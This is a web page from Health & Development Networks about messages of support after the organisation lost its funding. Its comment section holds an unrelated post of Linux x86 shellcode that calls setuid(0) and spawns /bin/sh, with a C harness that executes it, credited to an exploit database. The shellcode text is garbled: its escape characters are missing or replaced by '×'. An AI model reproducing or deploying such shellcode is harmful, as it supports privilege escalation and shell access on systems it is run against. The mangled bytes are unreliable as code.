Messages from Friends of HDN
Download (0.3 MB) | Send link | Print |
Following the sad news earlier this year that Health & Development Networks (HDN) had lost its core funding, HDN has received many heart warming messages of appreciation and support from the HDN family. HDN would like to thank everyone for their support and enthusiam over the last 10 years in ensuring that people most affected by and living with HIV and TB have a way to 'Speak Their World'.
Keywords: HDN, friends, messages, closure, Chiang Mai, KC
Comments and reviews
hi
linux/x86 setuid(0) && execve(/bin/sh,0,0) 27 bytes =============================================================
linux/x86 setuid(0) && execve(/bin/sh,0,0) shellcode 27 bytes
=============================================================
#Special Thanks Inj3ct0r Exploit DataBase
#I Love Inj3ct0r.Com
#include <stdio.h>
const char sc[]= "x31xdb" //xor ebx,ebx
"x8dx43×17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push/pop!
"x99" //cdq
"xcdx80" //int 80 //setuid(0) should returns 0 right? ;)
"xb0×0b" //mov al,0bh
"x52" //push edx /Termina la cadena //bin/sh con un 0
"x68×6ex2fx73×68" //push dword "hs/n"
"x68×2fx2fx62×69" //push dword "ib//"
"x89xe3" //mov ebx,edx
"x89xd1" //mov ecx,edx
"xcdx80"; //int 80h
int main()
{
printf("nSMALLEST SETUID && EXECVE GNU/LINUX x86 STABLE SHELLCODE "
"WITHOUT NULLS THAT SPAWNS A SHELL"
"nnCoded by vlan7"
"nt + http://www.vlan7.org"
"nn[+] Date: 4/Jul/2009"
"n[+] Thanks to: sch3m4"
"nn[+] Shellcode Size: %d bytesnn", sizeof(sc)-1);
(*(void (*)()) sc)();
return 0;
}
# Inj3ct0r.com [2010-08-15]- amin on 25 Aug 2010 | Rating
![]()
Write a comment or review
Login or register to submit messages, comments and reviews.











